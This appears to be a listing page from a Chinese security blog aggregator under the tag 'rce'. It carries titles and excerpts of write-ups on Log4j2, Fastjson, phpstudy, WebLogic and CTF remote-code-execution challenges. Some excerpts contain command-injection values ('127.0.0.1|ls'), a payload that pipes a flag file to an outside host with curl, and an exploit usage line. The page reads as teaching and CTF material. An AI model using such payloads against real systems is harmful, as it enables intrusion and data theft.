rce 第11页

Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)

ApacheLog4j2远程代码执行漏洞4.0.0org.examplelog4j-rce1.0-SNAPSHOT61.6org.apache.logging.log4jlog4j-core2.14.1org.apache.logging.log4jlog4j-api2.14.1org.apache.maven.pluginsmaven-surefire-plugin2.19.1maven-ass

吉吉_大王·2023-10-10 16:28

Log4j2 CVE-2021-45046 鸡肋RCE漏洞复现与浅析

文章目录0x00前言0x01CVE-2021-45046相关动态0x02漏洞浅析与复现可触发lookup功能的其它方式绕过Host白名单限制+反序列化Gadget在本地环境实现RCE使用knary快速创建

n0body-mole·2023-10-10 16:22

[HUBUCTF 2022 新生赛]HowToGetShell题解

老早以前遇到过无字母rce，但是现在忘记得差不多了。现在以这道题来回温一下rce的解决方法。和{进行异或得到E。这个选法不是固定的，只要两个非字母的字符进行异或得到想要的字母都可以。

dockerere·2023-10-10 15:22

[GXYCTF 2019]Ping Ping Ping题目解析

本题考察的内容是rce绕过，本事过滤的东西不算多也算是比较好绕过基础看到这种先ping一下试试看输入127.0.0.1看看有啥东西有回显说明可以接着往下做借用RCE漏洞详解及绕过总结(全面)-CSDN博客这个大佬整理的

狼丿王·2023-10-10 04:28

用友OA/NC/NCCloud SQL注入任意文件上传和读取RCE复现渗透测试记录

简介用友公司成立于1988年，全面提供具有自主知识产权的企业管理/ERP软件、服务与解决方案，是中国最大的管理软件、ERP软件、集团管理软件、人力资源管理软件、客户关系管理软件及小型企业管理软件提供商。漏洞情况用友OA_U8存在SQL注入用友NCCloudFS文件管理SQL注入用友NCbsh.servlet.BshServlet远程命令执行用友NC任意文件上传getShell漏洞复现1.用友OA_

烽铃子·2023-10-09 10:23

用友GRP-u8 注入-RCE漏洞

用友GRP-u8注入-RCE漏洞工作中遇到的漏洞，基于前人的复现教程成功复现，记录下自己的复现笔记，如有侵权，请联系我删除漏洞详情用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业

maverickpig·2023-10-09 10:23

三个代码执行漏洞的复现

这三个漏洞分别是：CNVD-2021-30167（用友NCBeanShell远程代码执行）CVE-2019-0193（ApacheSolrVelocity模板注入RCE）CVE-2020-14882（WeblogicConsole

gh0stf1re·2023-10-09 10:53

[鹏城杯 2022]简单的php - 无数字字母RCE+取反【*】

[鹏城杯2022]简单的php一、解题流程二、思考总结题目代码：80orpreg_match('/[A-Za-z0-9]|\'|"|`|\|,|\.|-|\+|=|\/|\\||\$|\?|\^|&|\|/is',$code)){die('Hello');}elseif(';'===preg_replace('/[^\s]+?$(?R)?$/','',$code)){@eval($co

Hillain·2023-10-09 03:52

Fastjson在实战中的检测与利用

如果上面这个poc可以出dnslog说明很大概率可以rce。后端检测{"@type":"

why811·2023-10-08 15:33

练[BJDCTF2020]EasySearch

文章目录[BJDCTF2020]EasySearch掌握知识解题思路关键paylaod掌握知识目录扫描，index.php.swp文件泄露，代码审计，MD5区块爆破，请求响应包的隐藏信息，.shtml文件RCE

生而逢时·2023-10-08 00:56

TCTF-2020-Chromium-Fullchain

概览rce+sbx。通过rce来开启mojo，然后再sbxbypass。

HAPPYers·2023-10-07 06:58

buuctf-[GXYCTF2019]禁止套娃 git泄露，无参数rce

用dirsearch扫一下，看到flag.php访问一下没啥东西，使用githackpython2GitHack.pyhttp://8996e81f-a75c-4180-b0ad-226d97ba61b2.node4.buuoj.cn/.git/查看index.php";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|filter:\/\/|p

木…·2023-10-06 18:43

Pikachu靶场——远程命令执行漏洞(RCE)

文章目录1.RCE1.1exec"ping"1.1.1源代码分析1.1.2漏洞防御1.2exec"eval"1.2.1源代码分析1.2.2漏洞防御1.3RCE漏洞防御1.RCERCE(remotecommand

来日可期x·2023-10-06 09:32

练[WUSTCTF2020]朴实无华

WUSTCTF2020]朴实无华文章目录[WUSTCTF2020]朴实无华掌握知识解题思路代码分析关键paylaod掌握知识目录扫描，抓包放包，代码审计，php函数特性的了解：intval函数，md5特性绕过，RCE

生而逢时·2023-10-06 06:48

钟馗之眼搜索+thinkphp5.*框架漏洞拿shell

仅供学习参考禁止骚操作漏洞详情参考：http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23%E5%8F%8Av5.1.31%E4%

啾哥·2023-10-06 06:35

CTFHUB - SSRF

filedictgopher内网访问伪协议读取文件端口扫描POST请求总结上传文件总结FastCGI协议CGI和FastCGI的区别FastCGI协议FastCGI和web服务器的交互过程PHP-FPM攻击原理实现RCE

双层小牛堡·2023-10-06 04:14

[GXYCTF2019]禁止套娃无回显 RCE 过滤FILE dirname等

扫除git通过githack获取index.php";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i',$_GET['exp'])){if(';'===preg_replace('/[a-z,_]+$(?R)?$/',NULL,$_GET['exp'])){if(!preg_

双层小牛堡·2023-10-06 04:14

练[极客大挑战 2019]RCE ME

[极客大挑战2019]RCEME文章目录[极客大挑战2019]RCEME掌握知识解题思路关键paylaod掌握知识RCE无数字和字母的bypass，取反异或递增解题思路打开题目链接，发现是代码审计的题目

生而逢时·2023-10-05 07:19

RCE远程命令/代码执行漏洞及绕过

1、远程命令执行1.1原理一般出现这种漏洞，是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面，用户从web界面输入目标IP，提交后，后台会对该IP地址进行一次ping测试，并返回测试结果。如果，设计者在完成该功能时，没有做严格的安全控制，则可能会导致攻击者通过该接口提交“意想不

G3et·2023-10-03 22:46

XWiki Platform 安全漏洞RCE：CVE-2023-37462

2023年7月14日，美国国家标准与技术研究院（NIST）维护的综合性漏洞数据库（NVD）第一次记录了这个漏洞，这个漏洞影响版本是从7.0到14.48（不包括）和从14.5到14.10.4（不包括）这篇文章对CVE-2023-37462漏洞进行复现，并对FOFA查询到的XWiki平台进行漏洞检测并分析，以及如何去修复这个漏洞。分析（1）找关键信息：通过Bing和Google的大量搜索得到一些关键的

Frank Zhang·2023-10-02 20:46

buuctf-[GYCTF2020]Blacklist

这题我一开始还以为是rce，但是看到注入框内写了1，那就肯定是sql提交11'报错，更加确定是sql1'orderby2--+说明是两列1'unionselect1,#发现select被过滤了这里我想起了之前做的强网杯的随便住

木…·2023-10-02 18:25

ctfshow—1024系列练习

1024柏拉图有点像rce远程执行，有四个按钮，分别对应四份php文件，开始搞一下。一开始，先要试探出文件上传到哪里？怎么读取上传的文件？

Lucky小小吴·2023-10-02 16:47

newstarctf

wpweb:1.rce可以发现这个变量名有下划线也有点。

El.十一·2023-10-02 05:43

src学习记录

注入漏洞https://zeroday.hitcon.org/vulnerability湾湾的思路hackone思路https://www.freebuf.com/author/cloudsJDWP调试接口RCE

梅苑安全&学术·2023-10-02 05:42

无参数RCE

无参数RCE一般情况下的命令执行都是由参数的，比

XiLitter·2023-10-01 15:52

phpstudy_2016-2018_rce_py脚本_布尔盲注脚本_延时注入脚本_布尔盲注脚本

phpstudy_2016-2018_rce_py脚本_布尔盲注脚本_延时注入脚本_布尔盲注脚本文章目录phpstudy_2016-2018_rce_py脚本_布尔盲注脚本_延时注入脚本_布尔盲注脚本一漏洞复现

煜磊·2023-10-01 11:19

Umbraco 7.12.4 RCE漏洞利用/ PoC

poc：https://github.com/dd404x/Umbraco-RCE用法$pythonexploit.py-husage:exploit.py[-h]-uUSER-pPASS-iURL-cCMD

e02f7fdbb400·2023-09-30 14:53

Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)

0x01漏洞简介:fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将JavaBean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将JavaBean序列化成JSON字符串，这样得到字符串之后就可以通过数据库等方式进行持久化了。阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞（CNVD-2

kukuromi·2023-09-28 13:02

vulhub-FastJson 1.2.24-rce漏洞复现

FastJson1.2.24-rce漏洞复现通俗理解就是：漏洞利用fastjsonautotype在处理json对象的时候，未对@type字段进行完全的安全性验证，攻击者可以传入危险类，并调用危险类连接远程

手打-通天路·2023-09-28 13:02

Nacos 反序列化漏洞初步探针

因为是Java并且idea使用比较熟练，根据个人喜好选择审计工具），确定审计思路，由于该漏洞是该漏洞存在于Nacos中，是一个反序列化漏洞，攻击者可以无限制使用hessian进行反序列化利用，最终实现RCE

kkdgyb6·2023-09-27 16:55

nacos 2.2.2 反序列化

漏洞描述Nacos在处理某些基于Jraft的请求时，采用Hessian进行反序列化，但并未设置限制，导致应用存在远程代码执行（RCE）漏洞。

ByNotD0g·2023-09-27 16:53

[极客大挑战 2019]RCE ME 取反绕过正则匹配绕过disable_function设置

目录取反1.蚁剑插件绕过2.baypassdisable_functionopen_dir/disable_functionputenv()/LD_PRELOAD来绕过限制利用条件利用思路有意思。。。。40){die("ThisistooLong.");}if(preg_match("/[A-Za-z0-9]+/",$code)){die("NO.");}@eval($code);}else{hi

双层小牛堡·2023-09-27 13:59

rce题目解析

狼丿王·2023-09-27 03:50

EXP武器库编写

文章目录pocsuite3工具SQL注入EXP布尔盲注优化最终优化延时注入phpstudy2016-2018-RCE利用DVWA文件上传metinfo_5.0.4EXPSQL-布尔盲注文件包含漏洞定制SQLmaptamper

过期的秋刀鱼-·2023-09-26 18:08

cve_2019_0708_bluekeep_rce漏洞复现

1、漏洞介绍CVE-2019-0708漏洞是添加了一个漏洞利用模块，该模块通过RDP利用远程Windows内核释放后使用漏洞。rdptermdd.sys驱动程序未正确处理绑定到仅限内部的通道ms_t120，从而允许格式错误的断开连接提供程序指示消息导致释放后被使用。利用可控制的数据和远程非分页面池堆喷射，使用空闲信道的间接调用小工具来实现任意代码执行。2、漏洞复现之前要准备一台win7操作系统或者

嚣张的海绵·2023-09-26 00:12

命令执行（rce）

1.命令与代码执行原理命令执行原理参数给变量未经过滤，直接使用了不安全的函数处理了变量127.0.0.1&&ipconfig有漏洞常用的函数assert,system,exec,shell_exec,eval,``(反单引号）代码执行原理参数给变量未经过滤，直接使用了不安全的函数处理了变量，使用了eval函数可以执行代码2.如何挖命令执行漏洞（1）执行系统命令:assert,system,pass

布满杂草的荆棘·2023-09-26 00:00

Python灰帽编程——定制EXP武器库

文章目录定制EXP之RCE1.常见模块介绍1.1base641.1.1base64编码1.1.2base64解码1.2string2.常规EXP编写2.1phpstudy_2016-2018_rce2.1.1

来日可期x·2023-09-25 03:50

XXE 漏洞及案例实战

1.基础概念1.1XML基础概念1.2XML与HTML的主要差异1.3xml示例2.演示案例2.1pikachu靶场XML2.1.1文件读取2.1.2内网探针或者攻击内网应用（触发漏洞地址）2.1.4RCE2.1.5

来日可期x·2023-09-25 03:17

定制EXP之RCE

文章目录1.常见模块介绍1.1base641.1.1base64编码1.1.2base64解码1.2string2.常规EXP编写2.1phpstudy_2016-2018_rce漏洞2.1.1漏洞利用脚本

网安咸鱼1517·2023-09-24 22:29

NSSCTF Round#7部分wp

Webec_RCE源码:啥都没过滤，直接拼接就行payload1action=;cat/flag2action=;curlvpsip:port/`cat/flag`0o0参考链接:谈一谈php://filter

v2ish1yan·2023-09-24 07:38

CTFshow web55

目录web55代码分析：通配符解题：构造rce上传脚本flag:web55代码分析：if(isset($_GET['c'])){$c=$_GET['c'];if(!

白帽Chen_D·2023-09-24 06:12

《Web安全基础》09. WAF 绕过

信息收集阶段2.2：漏洞发现阶段2.3：权限控制阶段2.3.1：密码混淆2.3.2：变量覆盖2.3.2：异或混淆2.4：漏洞利用阶段2.4.1：SQL注入2.4.2：文件上传2.4.3：XSS2.4.4：RCE

镜坛主·2023-09-24 02:32

【漏洞复现系列】二、weblogic-cve_2020_2883（RCE/反序列化）

Keywords：T3协议，weblogicServer，反序列化2.1、漏洞原理cve_2020_2883远程代码执行漏洞存在于WebLogicServer核心组件中,允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogicServer，成功的漏洞利用可导致WebLogicServer被攻击者接管，从而造成远程代码执行。2.2、影响版本OracleWebLogicServer

༄༊ξ陈丞（网安圈花瓶）࿐·2023-09-23 09:45

pickle反序列化RCE分析

pickle反序列化一.pickle模块1.1什么是pickle模块1.2常用函数1.3魔术方法二.例题[[BUUOJ]HFCTF2021Final]2.1题目分析2.2payload三.opcode编写3.1为什么要用到opcode3.2什么是opcode3.3常见的指令符3.4opcode执行原理3.5R指令被禁绕过3.6构造示例3.7一些tips四.例题长城杯[seeking]4.1题目分析

Elitewa·2023-09-23 08:44

-----已搬运-------【！总章程！】python反序列化入门学习

目录：1.利用__reduce__方法来RCE代码分析+实例熟悉更换指令执行RCE读写文件变量覆盖更换模块名可以执行有了__reduce__之后，正常反序列化代码消失？？重磅：如何手写opcode？

Zero_Adam·2023-09-23 08:44

TP-LINK WR941N路由器研究

TP-LINKWR941N路由器研究之前看到了一个CVE,CVE-2017-13772是TP-LinkWR940N后台的RCE,手头上正好有一个TP-LinkWR941N的设备，发现也存在相同的问题，但是

anrao3094·2023-09-23 01:20

做题（2）

1.command_execution题目提示：(这道题的名字就叫命令执行漏洞)发现ping先rce一下127.0.0.1|ls发现了东西尝试访问一下找到了所有的文件访问var文件夹发现在var/www

呕...·2023-09-23 01:48

利用 CocoaPods 服务器中的一个 RCE 漏洞，投毒数百万款app

奇安信代码卫士·2023-09-22 12:34

phpstudy2016 RCE漏洞验证

文章目录漏洞描述漏洞验证漏洞描述PHPStudyRCE（RemoteCodeExecution），也称为phpstudy_backdoor漏洞，是指PHPStudy软件中存在的一个远程代码执行漏洞。漏洞验证打开phpstudy2016，用bp自带的浏览器访问www目录下的phpinfo.php文件，访问后结果如下：然后在bp中将抓到的数据包发送到repeater模块：将system(‘ipconf

EMT00923·2023-09-22 09:54

phpstudy RCE脚本编写（Python）

文章目录编写过程脚本优化编写过程关于phpstudy2016-2018RCE漏洞的验证，请移步我的这篇博客phpstudy2016RCE漏洞验证。

EMT00923·2023-09-22 09:22

推荐频道

rce